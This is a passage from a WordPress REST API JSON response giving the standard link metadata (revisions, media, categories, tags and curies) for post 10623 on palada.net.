p\/v2\/posts\/10623\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10623"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10623"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10623"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}